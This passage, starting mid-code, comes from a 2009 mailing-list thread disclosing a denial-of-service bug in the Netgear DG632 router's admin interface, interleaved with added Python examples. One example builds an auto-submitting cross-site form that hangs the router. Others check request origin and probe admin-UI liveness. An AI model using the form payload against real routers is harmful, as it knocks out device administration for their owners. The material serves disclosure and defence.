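        result["during"] = admin_alive(host, port)
        time.sleep(HANG_SECONDS + 0.2)  # stands in for the power cycle
        result["after_restart"] = admin_alive(host, port)
        return result
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Run as a script it prints before: True, post_answered: False, during: False, after_restart: True. The probe is plain HTTP over TCP, so against a real device it detects exactly the condition Tom describes: the router keeps answering ping and handing out DHCP leases while the admin interface is gone, which is why dropping ICMP changes nothing here.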

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir '3APA3A' Dubrovin
Dear Tom Neaves,

 It  still can be exploited from Internet even if "remote management" is
only  accessible  from local network. If you can trick user to visit Web
page,  you  can  place  a  form on this page which targets to router and
request to router is issued from victim's browser.


--Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:

TN> Hi.

TN> I see where you're going but I think you're missing the point a little.  By
TN> *default* the web interface is enabled on the LAN and accessible by anyone
TN> on that LAN and the "remote management" interface (for the Internet) is
TN> turned off.  If the "remote management" interface was enabled, stopping ICMP
TN> echo responses would not resolve this issue at all, turning the interface
TN> off would do though (or restricting by IP, ...ack).  The "remote management"
TN> (love those quotes...) interface speaks over HTTP hence TCP so no amount of
TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to discuss
TN> this off list with you if it's still not clear to save spamming everyone's
TN> inboxes. :o)

TN> Tom

TN> - Original Message - 
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 11:03 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> I know and I understand. What I meant is that we cannot access the web
TN> interface of a Netgear router remotely if we cannot locally.
TN> As for the DoS, it is simple to solve  such attack from outside. We just
TN> disable receiving pings (There is actually an option in even the lowest
TN> series) and thus, we would be able to have a remote management without ICMP
TN> requests.



TN> 2009/6/15 Tom Neaves 

TN> Hi.

TN> I'm not quite sure of your question...

TN> The DoS can be carried out remotely, however one mitigating factor (which
TN> makes it a low risk as opposed to sirens and alarms...) is that it's turned
TN> off by default - you have to explicitly enable it under "Remote Management"
TN> on the device if you want to access it/carry out the DoS over the Internet.
TN> However, it is worth noting that anyone on your LAN can *remotely* carry out
TN> this attack regardless of this management feature being on/off.

TN> I hope this clarifies it for you.

TN> Tom
TN> - Original Message - 
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 10:45 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> How can it be carried out remotely if it bugs locally?


TN> 2009/6/15 Tom Neaves 

TN> Product Name: Netgear DG632 Router
TN> Vendor: http://www.netgear.com
TN> Date: 15 June, 2009
TN> Author: t...@tomneaves.co.uk 
TN> Original URL:
TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
TN> Discovered: 18 November, 2006
TN> Disclosed: 15 June, 2009

TN> I. DESCRIPTION

TN> The Netgear DG632 router has a web interface which runs on port 80.  This
TN> allows an admin to log in and administer the device's settings.  However,
TN> a Denial of Service (DoS) vulnerability exists that causes the web interface
TN> to crash and stop responding to further requests.

TN> II. DETAILS

TN> Within the "/cgi-bin/" directory of the administrative web interface exists
TN> a file called "firmwarecfg".  This file is used for firmware upgrades.  An
TN> HTTP POST request for this file causes the web server to hang.  The web
TN> server will stop responding to requests and the administrative interface
TN> will become inaccessible until the router is physically restarted.

TN> While the router will still continue to function at the network level, i.e.
TN> it will still respond to ICMP echo requests and issue leases via DHCP, an
TN> administrator will no longer be able to interact with the administrative
TN> web interface.

TN> This attack can be carried out internally within the network, or over the
TN> Internet if the administrator has enabled the "Remote Management" feature
TN> on the router.

TN> Affected Versions: Firmware V3.4.0_ap (others unknown)

TN> III. VENDOR RESPONSE

TN> 12 June, 2009 - Contacted vendor.
TN> 15 June, 2009 - Vendor responded.  Stated the DG632 is an end-of-life
TN> product and is no longer supported in a production and development sense;
TN> as such, there will be no further firmware releases to resolve this issue.

TN> IV. CREDIT

TN> Discovered by Tom Neaves 

TN> ___
TN> Full-Disclosure - We believe in it.
TN> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
TN> Hosted and sponsored by Secunia - http://secunia.com/


-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
For facts are facts, and they are set down only so that they may be understood
and believed. (Twain)


Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Hanno Böck
On Monday, 15 June 2009, Tom Neaves wrote:
> Within the "/cgi-bin/" directory of the administrative web interface exists
> a file called "firmwarecfg".  This file is used for firmware upgrades.  An
> HTTP POST request for this file causes the web server to hang.  The web
> server will stop responding to requests and the administrative interface
> will become inaccessible until the router is physically restarted.
>
> While the router will still continue to function at the network level, i.e.
> it will still respond to ICMP echo requests and issue leases via DHCP, an
> administrator will no longer be able to interact with the administrative
> web interface.
>
> This attack can be carried out internally within the network, or over the
> Internet if the administrator has enabled the "Remote Management" feature
> on the router.

I don't have such a device to test with, but isn't it possible to exploit this
remotely through CSRF even without the "Remote Management" option?
(i.e. put some JavaScript on a web page that sends a POST request to the
default IP of the router?)

-- 
Hanno Böck  Blog:   http://www.hboeck.de/
GPG: 3DBD3B20   Jabber/Mail:ha...@hboeck.de
http://ausdenaugenausdemsinn.de - No safety discount for CO2 storage
http://tinyurl.com/dceu73 - Stop Internet censorship!

http://schokokeks.org - professional webhosting


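The cross-site form that Vladimir Dubrovin and Hanno Böck describe above, next to the header check a CGI handler could apply to refuse it, as an added example. This is not code from the thread, from Netgear or from the DG632 firmware; only the path /cgi-bin/firmwarecfg comes from the advisory. The LAN address 192.168.1.1, the cookie name, the hidden form field and the sample requests are assumptions constructed for the demonstration.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit

FIRMWARE_CGI = "/cgi-bin/firmwarecfg"   # path named in the advisory
ROUTER_HOST = "192.168.1.1"            # assumed LAN address of the router


def csrf_form_page(router_host: str = ROUTER_HOST) -> str:
    """HTML a hostile site could serve. The form targets the router on the
    victim's LAN and is submitted by script on load, so no click is needed
    and the request is a POST, not a GET. The browser attaches the router's
    session cookie to this cross-site request exactly as it would to a
    request made from the router's own pages; the hostile page never sees
    the response and does not need to. The hidden field is a placeholder:
    the advisory reports that the POST itself is what hangs the server."""
    return (
        "<html><body>\n"
        f'<form id="f" method="POST" action="http://{router_host}{FIRMWARE_CGI}"\n'
        '      enctype="multipart/form-data">\n'
        '  <input type="hidden" name="placeholder" value="1">\n'
        "</form>\n"
        "<script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    )


@dataclass
class Request:
    """The parts of an HTTP request the check needs (constructed samples below)."""
    method: str
    path: str
    headers: dict


def origin_of(url: str) -> str:
    """scheme://host[:port] of a URL, lower-cased for comparison."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def accept_admin_post(req: Request) -> bool:
    """The check the router's CGI lacks: honour a state-changing POST only when
    the browser says it came from the router's own pages. Origin is preferred;
    Referer is accepted for browsers that do not send Origin; with neither the
    request is refused (fail closed). A valid session cookie alone proves
    nothing, because the browser sends it with the cross-site form post too."""
    if req.method.upper() != "POST":
        return False
    host = req.headers.get("Host")
    if not host:
        return False
    expected = f"http://{host}".lower()     # the router only speaks plain HTTP on port 80
    origin = req.headers.get("Origin")
    if origin is None:
        referer = req.headers.get("Referer")
        if referer is None:
            return False
        origin = origin_of(referer)
    return origin.lower() == expected


# Constructed sample requests: what the router would see in each case.
LEGIT = Request("POST", FIRMWARE_CGI,
                {"Host": ROUTER_HOST, "Origin": f"http://{ROUTER_HOST}",
                 "Cookie": "session=abc123"})
CROSS_SITE = Request("POST", FIRMWARE_CGI,
                     {"Host": ROUTER_HOST, "Origin": "http://attacker.example",
                      "Cookie": "session=abc123"})
CROSS_SITE_OLD_BROWSER = Request("POST", FIRMWARE_CGI,
                                 {"Host": ROUTER_HOST,
                                  "Referer": "http://attacker.example/lure.html",
                                  "Cookie": "session=abc123"})
NO_PROVENANCE = Request("POST", FIRMWARE_CGI,
                        {"Host": ROUTER_HOST, "Cookie": "session=abc123"})

if __name__ == "__main__":
    for name, r in [("legit", LEGIT), ("cross-site", CROSS_SITE),
                    ("cross-site, no Origin", CROSS_SITE_OLD_BROWSER),
                    ("no Origin/Referer", NO_PROVENANCE)]:
        print(f"{name:24s} -> {'accept' if accept_admin_post(r) else 'reject'}")
```

The check refuses the cross-site post in every variant while still accepting a post from a page the router itself served. It is a mitigation an admin cannot retrofit to unsupported firmware; for the DG632 as shipped, the practical defences remain keeping "Remote Management" off and not browsing untrusted sites from a machine logged in to the router.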

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Alaa El yazghi
I know and I understand. What I meant is that we cannot eventually
access the web interface of a Netgear router remotely if we cannot locally.
As for the DoS, it is simple to solve such an attack from outside. We just
disable receiving pings (there is actually an option in even the lowest
series) and thus we would be able to have remote management without ICMP
requests.



2009/6/15 Tom Neaves 

>  Hi.
>
> I'm not quite sure of your question...
>
> The DoS can be carried out remotely, however one mitigating factor (which
> makes it a low risk as opposed to sirens and alarms...) is that it's turned
> off by default - you have to explicitly enable it under "Remote Management"
> on the device if you want to access it/carry out the DoS over the Internet.
> However, it is worth noting that anyone on your LAN can *remotely* carry out
> this attack regardless of this management feature being on/off.
>
> I hope this clarifies it for you.
>
> Tom
>
>  - Original Message -
> *From:* Alaa El yazghi 
> *To:* Tom Neaves 
> *Cc:* bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
>  *Sent:* Monday, June 15, 2009 10:45 PM
> *Subject:* Re: Netgear DG632 Router Remote DoS Vulnerability
>
>  How can it be carried out remotely if it bugs locally?
>
> 2009/6/15 Tom Neaves 
>
>> Product Name: Netgear DG632 Router
>> Vendor: http://www.netgear.com
>> Date: 15 June, 2009
>> Author: t...@tomneaves.co.uk 
>> Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
>> Discovered: 18 November, 2006
>> Disclosed: 15 June, 2009
>>
>> I. DESCRIPTION
>>
>> The Netgear DG632 router has a web interface which runs on port 80.  This
>> allows an admin to log in and administer the device's settings.  However,
>> a Denial of Service (DoS) vulnerability exists that causes the web interface
>> to crash and stop responding to further requests.
>>
>> II. DETAILS
>>
>> Within the "/cgi-bin/" directory of the administrative web interface exists
>> a file called "firmwarecfg".  This file is used for firmware upgrades.  An
>> HTTP POST request for this file causes the web server to hang.  The web
>> server will stop responding to requests and the administrative interface
>> will become inaccessible until the router is physically restarted.
>>
>> While the router will still continue to function at the network level, i.e.
>> it will still respond to ICMP echo requests and issue leases via DHCP, an
>> administrator will no longer be able to interact with the administrative
>> web interface.
>>
>> This attack can be carried out internally within the network, or over the
>> Internet if the administrator has enabled the "Remote Management" feature
>> on the router.
>>
>> Affected Versions: Firmware V3.4.0_ap (others unknown)
>>
>> III. VENDOR RESPONSE
>>
>> 12 June, 2009 - Contacted vendor.
>> 15 June, 2009 - Vendor responded.  Stated the DG632 is an end-of-life
>> product and is no longer supported in a production and development sense;
>> as such, there will be no further firmware releases to resolve this issue.
>>
>> IV. CREDIT
>>
>> Discovered by Tom Neaves
>>
>
>

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Alaa El yazghi
How can it be carried out remotely if it bugs locally?

2009/6/15 Tom Neaves 

> Product Name: Netgear DG632 Router
> Vendor: http://www.netgear.com
> Date: 15 June, 2009
> Author: t...@tomneaves.co.uk 
> Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
> Discovered: 18 November, 2006
> Disclosed: 15 June, 2009
>
> I. DESCRIPTION
>
> The Netgear DG632 router has a web interface which runs on port 80.  This
> allows an admin to log in and administer the device's settings.  However,
> a Denial of Service (DoS) vulnerability exists that causes the web interface
> to crash and stop responding to further requests.
>
> II. DETAILS
>
> Within the "/cgi-bin/" directory of the administrative web interface exists
> a file called "firmwarecfg".  This file is used for firmware upgrades.  An
> HTTP POST request for this file causes the web server to hang.  The web
> server will stop responding to requests and the administrative interface
> will become inaccessible until the router is physically restarted.
>
> While the router will still continue to function at the network level, i.e.
> it will still respond to ICMP echo requests and issue leases via DHCP, an
> administrator will no longer be able to interact with the administrative
> web interface.
>
> This attack can be carried out internally within the network, or over the
> Internet if the administrator has enabled the "Remote Management" feature
> on the router.
>
> Affected Versions: Firmware V3.4.0_ap (others unknown)
>
> III. VENDOR RESPONSE
>
> 12 June, 2009 - Contacted vendor.
> 15 June, 2009 - Vendor responded.  Stated the DG632 is an end-of-life
> product and is no longer supported in a production and development sense;
> as such, there will be no further firmware releases to resolve this issue.
>
> IV. CREDIT
>
> Discovered by Tom Neaves
>

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-15 Thread Tom Neaves
Hi.

I see where you're going but I think you're missing the point a little.  By 
*default* the web interface is enabled on the LAN and accessible by anyone 
on that LAN and the "remote management" interface (for the Internet) is 
turned off.  If the "remote management" interface was enabled, stopping ICMP 
echo responses would not resolve this issue at all, turning the interface 
off would do though (or restricting by IP, ...ack).  The "remote management" 
(love those quotes...) interface speaks over HTTP hence TCP so no amount of 
dropping ICMP goodness will help with this.  Anyhow, I am happy to discuss 
this off-list with you if it's still not clear, to save spamming everyone's 
inboxes. :o)

Tom

- Original Message - 
From: Alaa El yazghi
To: Tom Neaves
Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
Sent: Monday, June 15, 2009 11:03 PM
Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


I know and I understand. What I meant is that we cannot eventually
access the web interface of a Netgear router remotely if we cannot locally.
As for the DoS, it is simple to solve such an attack from outside. We just
disable receiving pings (there is actually an option in even the lowest
series) and thus we would be able to have remote management without ICMP
requests.



2009/6/15 Tom Neaves 

Hi.

I'm not quite sure of your question...

The DoS can be carried out remotely, however one mitigating factor (which 
makes it a low risk as opposed to sirens and alarms...) is that it's turned 
off by default - you have to explicitly enable it under "Remote Management" 
on the device if you want to access it/carry out the DoS over the Internet. 
However, it is worth noting that anyone on your LAN can *remotely* carry out 
this attack regardless of this management feature being on/off.

I hope this clarifies it for you.

Tom
- Original Message - 
From: Alaa El yazghi
To: Tom Neaves
Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
Sent: Monday, June 15, 2009 10:45 PM
Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


How can it be carried out remotely if it bugs locally?


2009/6/15 Tom Neaves 

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: t...@tomneaves.co.uk 
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.  This
allows an admin to log in and administer the device's settings.  However,
a Denial of Service (DoS) vulnerability exists that causes the web interface
to crash and stop responding to further requests.

II. DETAILS

Within the "/cgi-bin/" directory of the administrative web interface exists
a file called "firmwarecfg".  This file is used for firmware upgrades.  An
HTTP POST request for this file causes the web server to hang.  The web
server will stop responding to requests and the administrative interface
will become inaccessible until the router is physically restarted.

While the router will still continue to function at the network level, i.e.
it will still respond to ICMP echo requests and issue leases via DHCP, an
administrator will no longer be able to interact with the administrative
web interface.

This attack can be carried out internally within the network, or over the
Internet if the administrator has enabled the "Remote Management" feature
on the router.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 - Contacted vendor.
15 June, 2009 - Vendor responded.  Stated the DG632 is an end-of-life
product and is no longer supported in a production and development sense;
as such, there will be no further firmware releases to resolve this issue.

IV. CREDIT

Discovered by Tom Neaves 



Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-15 Thread Tom Neaves
Hi.

I'm not quite sure of your question...

The DoS can be carried out remotely, however one mitigating factor (which makes 
it a low risk as opposed to sirens and alarms...) is that it's turned off by 
default - you have to explicitly enable it under "Remote Management" on the 
device if you want to access it/carry out the DoS over the Internet.  However, 
it is worth noting that anyone on your LAN can *remotely* carry out this attack 
regardless of this management feature being on/off.

I hope this clarifies it for you.

Tom
  - Original Message - 
  From: Alaa El yazghi 
  To: Tom Neaves 
  Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk 
  Sent: Monday, June 15, 2009 10:45 PM
  Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


  How can it be carried out remotely if it bugs locally?


  2009/6/15 Tom Neaves 

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: t...@tomneaves.co.uk 
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.  This
allows an admin to log in and administer the device's settings.  However,
a Denial of Service (DoS) vulnerability exists that causes the web interface
to crash and stop responding to further requests.

II. DETAILS

Within the "/cgi-bin/" directory of the administrative web interface exists
a file called "firmwarecfg".  This file is used for firmware upgrades.  An
HTTP POST request for this file causes the web server to hang.  The web
server will stop responding to requests and the administrative interface
will become inaccessible until the router is physically restarted.

While the router will still continue to function at the network level, i.e.
it will still respond to ICMP echo requests and issue leases via DHCP, an
administrator will no longer be able to interact with the administrative
web interface.

This attack can be carried out internally within the network, or over the
Internet if the administrator has enabled the "Remote Management" feature
on the router.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 - Contacted vendor.
15 June, 2009 - Vendor responded.  Stated the DG632 is an end-of-life
product and is no longer supported in a production and development sense;
as such, there will be no further firmware releases to resolve this issue.

IV. CREDIT

Discovered by Tom Neaves 



[Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-15 Thread Tom Neaves
Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: t...@tomneaves.co.uk 
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.  This
allows an admin to log in and administer the device's settings.  However,
a Denial of Service (DoS) vulnerability exists that causes the web interface
to crash and stop responding to further requests.

II. DETAILS

Within the "/cgi-bin/" directory of the administrative web interface exists
a file called "firmwarecfg".  This file is used for firmware upgrades.  An
HTTP POST request for this file causes the web server to hang.  The web
server will stop responding to requests and the administrative interface
will become inaccessible until the router is physically restarted.

While the router will still continue to function at the network level, i.e.
it will still respond to ICMP echo requests and issue leases via DHCP, an
administrator will no longer be able to interact with the administrative
web interface.

This attack can be carried out internally within the network, or over the
Internet if the administrator has enabled the "Remote Management" feature
on the router.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 - Contacted vendor.
15 June, 2009 - Vendor responded.  Stated the DG632 is an end-of-life
product and is no longer supported in a production and development sense;
as such, there will be no further firmware releases to resolve this issue.

IV. CREDIT

Discovered by Tom Neaves 

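A liveness check for the admin interface, added here as an example; it is not part of the advisory and not Netgear tooling. The advisory notes that after the web server hangs the router still answers ICMP echo and still hands out DHCP leases, so a ping-based monitor would keep reporting the device healthy. The probe below instead opens a TCP connection to the web port and requires an HTTP status line within a timeout, which is what actually goes missing. The two local stub listeners are constructed so the probe can be exercised without a router; the port and timeout values are assumptions.

```python
import socket
import threading

_held_open = []   # sockets the "hung" stub keeps open so they are not closed by GC


def admin_ui_responding(host: str, port: int = 80, timeout: float = 3.0,
                        path: str = "/") -> bool:
    """True only if a TCP connection succeeds AND an HTTP status line arrives
    within the timeout. A host whose web server has wedged (the state the
    advisory describes) may still accept the connection but never answers,
    so it reads as down here even though it still answers ping."""
    request = f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            # read until the end of the status line, or give up at 1 KiB
            while b"\r\n" not in data and len(data) < 1024:
                chunk = s.recv(256)
                if not chunk:
                    break
                data += chunk
    except OSError:
        # connection refused, host unreachable, or timed out waiting for a reply
        return False
    return data.startswith(b"HTTP/")


def start_stub(hung: bool) -> int:
    """Constructed test double: a local listener on a random port. hung=False
    behaves like a working admin UI; hung=True accepts the connection and
    never replies, which is how a hung web server looks from the network."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            if hung:
                _held_open.append(conn)    # keep it open, send nothing
                continue
            with conn:
                conn.recv(1024)
                conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 0\r\n\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return port


def free_port() -> int:
    """A port nothing is listening on, for the 'connection refused' case."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    up, hung, closed = start_stub(False), start_stub(True), free_port()
    for label, port in [("working UI", up), ("hung UI", hung),
                        ("nothing listening", closed)]:
        ok = admin_ui_responding("127.0.0.1", port, timeout=1.0)
        print(f"{label:18s} port {port}: {'responding' if ok else 'NOT responding'}")
```

Run against a real device, admin_ui_responding(<router LAN address>) from a cron job or monitoring agent distinguishes "router forwarding but admin UI dead, power-cycle needed" from "router up", a distinction an ICMP check cannot make for this bug.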